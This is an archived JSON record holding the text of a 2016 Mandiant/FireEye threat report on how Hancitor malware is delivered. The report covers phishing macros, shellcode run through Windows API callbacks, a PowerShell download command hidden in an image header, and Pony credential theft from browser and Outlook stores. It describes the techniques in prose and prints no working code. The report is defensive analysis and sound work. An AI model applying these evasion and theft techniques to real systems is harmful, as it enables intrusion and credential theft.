{
	"id": "26813a09-c44f-40af-93ca-9d12024ee862",
	"created_at": "2026-04-06T00:18:33.407944Z",
	"updated_at": "2026-04-10T03:21:21.364549Z",
	"deleted_at": null,
	"sha1_hash": "861bb0db79af46fb50a8d820e914b6cbe15b8892",
	"title": "Hancitor (AKA Chanitor) observed using multiple attack approaches | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 441721,
	"plain_text": "Hancitor (AKA Chanitor) observed using multiple attack\r\napproaches | Mandiant\r\nBy Mandiant\r\nPublished: 2016-09-23 · Archived: 2026-04-05 17:37:10 UTC\r\nWritten by: Ankit Anubhav, Dileep Jallepalli\r\nMany threat actors use multiple attack vectors to ensure success. The individuals using Hancitor malware (also\r\nknown by the name Chanitor) are no exception and have taken three approaches to deliver the malware in order to\r\nultimately steal data from their victims. These techniques include uncommon API abuse and PowerShell methods.\r\nWe recently observed Hancitor attacks against some of our FireEye Exploit Guard customers. The malicious\r\ndocument used to deliver the Hancitor executable was observed being distributed as an attachment in email spam.\r\nOnce downloaded and executed, it drops an intermediate payload that further downloads a Pony DLL and Vawtrak\r\nexecutable, which perform data theft and connect to a command and control (C2) server.\r\nStage 1: Email Delivery\r\nWe observed a number of phishing emails that reference an invoice, as seen in Figure 1. The attachment in these\r\nemails is a weaponized Microsoft Office document containing a malicious macro that – when enabled – leads to\r\nthe download of Hancitor.\r\nFigure 1: Email with a malicious document attached\r\nStage 2: Macro and Luring Mechanism\r\nUpon opening the attachment, a typical luring mechanism is employed instructing the victim to enable macros, as\r\nseen in Figure 2. FireEye has observed the attackers behind this campaign using three different approaches.\r\nhttps://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html\r\nPage 1 of 9\n\nFigure 2: Luring the victim to enable macros\r\nFirst Approach\r\nUnlike other malicious macros, this one is not using APIs directly to run the payload. Macros can call APIs\r\ndirectly, but normally are not supposed to run shellcode. The macro used to deliver Hancitor calls the native\r\nWindows API, “CallWindowProc”, which can be used to interpret and execute shellcode, as depicted in Figure 3.\r\nFigure 3: Code within the macro that uses the CallWindowProc API to execute shellcode\r\nSecond Approach\r\nRecently, FireEye Exploit Guard captured Hancitor samples that leverage a new API Callback function. In\r\naddition to “CallWindowProc”, Hancitor samples may use the function EnumResourceTypesA to interpret and\r\nexecute shellcode, as seen in Figure 4.\r\nhttps://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html\r\nPage 2 of 9\n\nFigure 4: EnumResourceTypesA API declaration\r\nThird Approach\r\nWe also observed a third approach used by a malicious document file to deliver Hancitor. Although the threat\r\nactor and command and control servers are similar to the second Hancitor delivery approach, this one uses an\r\nalternate tactic to reach its goal of data theft.\r\nWith this approach, the luring message shown in the Figure 2 now serves another purpose. Not only does it lure\r\nthe victim into enabling the macros, but it also is assigned an alternate text: “fkwarning”, as seen in Figure 5. The\r\nmacro has code to check this attribute to make sure the luring message shape object is present. If this object is not\r\nfound, the macro will exit without downloading additional payloads.\r\nhttps://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html\r\nPage 3 of 9\n\nFigure 5:  Code to ensure that the luring message is intact and the malicious document is executed for the first\r\ntime\r\nEven if it finds the luring message, it will run the macro once and will delete the shape so that the macro will\r\nnever be executed again, as seen in Figure 6.\r\nFigure 6: Code to delete the shape that includes the lure message\r\nThe malicious macro replaces the deleted image with another that displays the text “network error” to reduce user\r\nsuspicions, as shown in Figure 7. Note that text is always present in the malicious macro, but it will only be made\r\nvisible by the macro when it is executing for the first time.\r\nFigure 7: The hidden text that becomes visible once the macro is executed for the first time\r\nThe macro then combines fragments of code to make a PowerShell command. However, unlike in the other\r\napproaches, the malicious code is not hidden in the code or form or metadata. We observed that the malware\r\nextracts malicious code fragments from within the section_header of the embedded image and combines them into\r\na PowerShell command on the fly, as seen in Figure 8. This technique will evade some basic static methods of\r\ndetection applied to macros macro forms.\r\nFigure 8:  PowerShell command observed in header after increasing font size\r\nThe malware authors have taken a very simple but interesting approach to obscure the PowerShell command text.\r\nThe font size is set to microscopic level 1, as seen in Figure 9. This reduces the likelihood that a casual observer\r\nhttps://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html\r\nPage 4 of 9\n\nwill notice something unusual.\r\nFigure 9: Minimal font size to hide content of header\r\nUsing the “DownloadFile” method, PowerShell obtains a payload from an attacker-controlled website in a ZIP\r\narchive format. PowerShell uses the “copyhere” function to unzip the payload. The “.Item” attribute is also set to\r\n“16”, which ignores all warnings, as seen in Figure 10.\r\nFigure 10: Code to download archived payload and unzip it\r\nOnce the downloaded executable is extracted from the ZIP archive, the macro code deletes the archive using the\r\n“Kill” function, as seen in Figure 11. After the executable is executed, it downloads Pony and Vawtrak malware\r\nvariants to steal data.\r\nFigure 11: Code to delete the archive\r\nDifferent Approaches, Same Hancitor\r\nAlthough there are differences between the second and third approaches to distributing Hancitor, the objective of\r\nthe threat actor is the same, as we found the same command and control server being used in both approaches.\r\nhttps://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html\r\nPage 5 of 9\n\nHowever, we can see a minor change in the second Hancitor approach command and control servers when\r\ncompared to the first Hancitor approach command and control servers, with URLs ending with ls5/gate.php\r\ninstead of ls4/gate.php, as seen in Figure 12.\r\nFigure 12: Earlier and newer Hancitor gates\r\nStage 3: First stage payload\r\nThe file copies itself to “%system32%” and creates a registry run key entry for persistence. Upon execution, it will\r\ncommunicate with an attacker-controller website to download a variant of the Pony malware, “pm.dll” along with\r\na standard Vawtrak trojan.\r\nStage 4: Second stage payload Pony data exfiltration capabilities\r\nWe observed a number of data theft capabilities in the second stage Pony variant, including:\r\n1) Stealing autocomplete Intelliforms data, which may include user passwords, as seen in Figure 13.\r\nhttps://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html\r\nPage 6 of 9\n\nFigure 13: Stealing the content of the Intelliforms registry key\r\n2) The unique GUID seen in Figure 14 helps to decrypt credentials from credential store. There is a good amount\r\nof documentation on various forums on how to use this salted value to access credentials.\r\nFigure 14: Credential stealing\r\nhttps://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html\r\nPage 7 of 9\n\n3) Accessing Mozilla saved passwords from “signons.txt,” as seen in Figure 15.\r\nFigure 15: Accessing Mozilla saved passwords\r\n4) Figure 16 shows the malware code related to theft via accessing Microsoft OMI Email configuration\r\ninformation. We can also see registry entries related to storing Outlook Profile, which contains information about\r\nwhere emails and other data is stored being accessed.\r\nFigure 16: Malware code for Outlook data theft via registry access\r\nConclusion\r\nhttps://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html\r\nPage 8 of 9\n\nThe malware authors responsible for Hancitor have developed several capabilities within malicious macros that\r\nsupport malware installation and data theft. These capabilities include leveraging uncommon APIs and obscuring\r\nmalicious PowerShell commands, tactics that made detection more challenging.\r\nFireEye Exploit Guard provides organizations with the ability to detect malicious shellcode in the initial phase of\r\nthe attack lifecycle, regardless of these evasion techniques.\r\nFireEye recommends that organizations block macros in Microsoft Office documents that originate from the\r\nInternet by Group Policy. In all cases, users should be cautious about enabling macros and should practice\r\nvigilance about opening email messages from untrusted sources.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html\r\nhttps://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html"
	],
	"report_names": [
		"hancitor_aka_chanit.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434713,
	"ts_updated_at": 1775791281,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/861bb0db79af46fb50a8d820e914b6cbe15b8892.pdf",
		"text": "https://archive.orkl.eu/861bb0db79af46fb50a8d820e914b6cbe15b8892.txt",
		"img": "https://archive.orkl.eu/861bb0db79af46fb50a8d820e914b6cbe15b8892.jpg"
	}
}